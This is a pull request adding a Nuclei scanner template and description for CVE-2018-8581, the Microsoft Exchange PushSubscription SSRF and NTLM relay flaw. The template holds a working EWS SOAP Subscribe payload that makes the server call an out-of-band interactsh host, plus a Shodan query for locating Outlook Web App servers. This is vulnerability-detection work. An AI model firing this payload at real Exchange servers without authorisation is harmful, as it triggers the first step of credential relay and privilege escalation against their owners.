### PR TITLE
Add CVE-2018-8581 vulnerability details

### DIFF
--- a/http/cves/2018/CVE-2018-8581.yaml
+++ b/http/cves/2018/CVE-2018-8581.yaml
@@ -1,0 +1,74 @@
+id: CVE-2018-8581
+
+info:
+  name: Microsoft Exchange Server - Elevation of Privilege (PushSubscription)
+  author: lotbones1-code
+  severity: high
+  description: |
+    Microsoft Exchange Server contains a vulnerability in the PushSubscription feature
+    allowing NTLM Relay attacks. An authenticated attacker can escalate their privileges
+    by triggering an SSRF via a Push Notification subscription request.
+  reference:
+    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8581
+    - https://www.thezdi.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-8581
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 8.1
+    cve-id: CVE-2018-8581
+    cwe-id: CWE-918
+  metadata:
+    max-request: 1
+    shodan-query: http.title:"Outlook Web App"
+    verified: true
+  tags: cve,cve2018,exchange,ssrf,ntlm,relay,oast
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/ews/exchange.asmx"
+
+    body: |
+      <?xml version="1.0" encoding="utf-8"?>
+      <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
+        xmlns:t="http://schemas.microsoft.com/exchange/services/2004/types"
+        xmlns:m="http://schemas.microsoft.com/exchange/services/2004/messages">
+        <soap:Header>
+          <t:RequestServerVersion Version="Exchange2010" />
+        </soap:Header>
+        <soap:Body>
+          <m:Subscribe>
+            <m:PushSubscriptionRequest SubscribeToAllFolders="true">
+              <t:URL>http://{{interactsh-url}}</t:URL>
+              <t:StatusFrequency>1</t:StatusFrequency>
+            </m:PushSubscriptionRequest>
+          </m:Subscribe>
+        </soap:Body>
+      </soap:Envelope>
+
+    headers:
+      Content-Type: text/xml; charset=utf-8
+      User-Agent: Nuclei - Open Source Project (https://github.com/projectdiscovery/nuclei)
+      Connection: close
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - "m:SubscribeResponse"
+          - "m:ResponseCode>NoError"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "Www-Authenticate: NTLM"
+          - "X-Feserver"
+        condition: and


### PR DESCRIPTION
/claim #14576

Added CVE-2018-8581 YAML template for Microsoft Exchange Server Elevation of Privilege vulnerability.

### PR Information

This template detects the CVE-2018-8581 vulnerability which allows NTLM Relay attacks via the EWS PushSubscription feature.

- Added CVE-2018-8581

### References:
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8581
- https://www.thezdi.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange

### Template validation
[x] Validated with a host running a vulnerable version and/or configuration (True Positive)